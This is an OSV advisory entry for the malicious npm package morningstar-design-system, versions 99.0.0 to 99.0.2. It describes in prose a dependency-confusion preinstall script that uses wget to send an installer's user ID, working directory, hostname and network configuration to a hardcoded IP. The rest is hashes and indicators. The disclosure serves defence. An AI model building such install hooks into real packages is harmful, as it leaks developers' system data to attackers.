MAL-2026-5449

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5449
Published
2026-06-09T17:34:46Z
Modified
2026-06-09T19:01:29.458566023Z
Summary
Malicious code in morningstar-design-system (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e)

On npm install, the package's preinstall lifecycle script runs wget against a hardcoded bare-IP HTTP endpoint, passing the output of id, pwd, hostname, and ip a as URL query parameters. This leaks the installing user's username/UID/GID, working directory, hostname, and full network interface configuration to an attacker-controlled host automatically, before any other code runs. The package name targets Morningstar's organizational namespace and is published at an absurd 99.0.1 version — the canonical dependency-confusion shape designed to override an internal package of the same name. README self-identifies as a dependency-confusion PoC. Whether labeled research or not, the published artifact actively exfiltrates installer data to a third-party IP and is unsafe to install in any environment.

Database specific 
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005075",
            "import_time": "2026-06-09T17:45:52.969057726Z",
            "sha256": "18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:35:31Z",
            "versions": [
                "99.0.1"
            ]
        },
        {
            "id": "IN-MAL-2026-005066",
            "import_time": "2026-06-09T17:45:52.33397188Z",
            "sha256": "b7c142e1dbd0c447de86c8f45555623eec0ca091eb202b435865aaa5688c76de",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:34:46Z",
            "versions": [
                "99.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-005123",
            "import_time": "2026-06-09T18:50:17.395581784Z",
            "sha256": "06a27dd57899084595fca32ae35722b70847a43879cb19a17b1d21f95fb6840a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:45:56Z",
            "versions": [
                "99.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / morningstar-design-system

Package

Name
morningstar-design-system
View open source insights on deps.dev
Purl
pkg:npm/morningstar-design-system

Affected ranges

Affected versions

99.*
99.0.0
99.0.1
99.0.2

Database specific

cwes 
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators 
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "c6baf6fd432a663cf231f93848d0286121864c60d167e54e64c6e8c819584fa2",
            "tlsh": "c611ef78d730ad330fe50ae0947a12167673fae78d066c1da6d2100fdb0e9d3207c01a"
        }
    ],
    "package_integrity": [
        {
            "filename": "morningstar-design-system-99.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-mRsaNIScm4W4V3+d8aD0yP2L6SJP1khxHgzZLKbfQjtLgdvzUTL2LthDKCDIZBr1gHl+oomciLUs1ALrhj9r1g==",
                "sha1": "fbc61e4d181354b087d7a4032de79a54c8a60af0"
            }
        }
    ]
}
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json"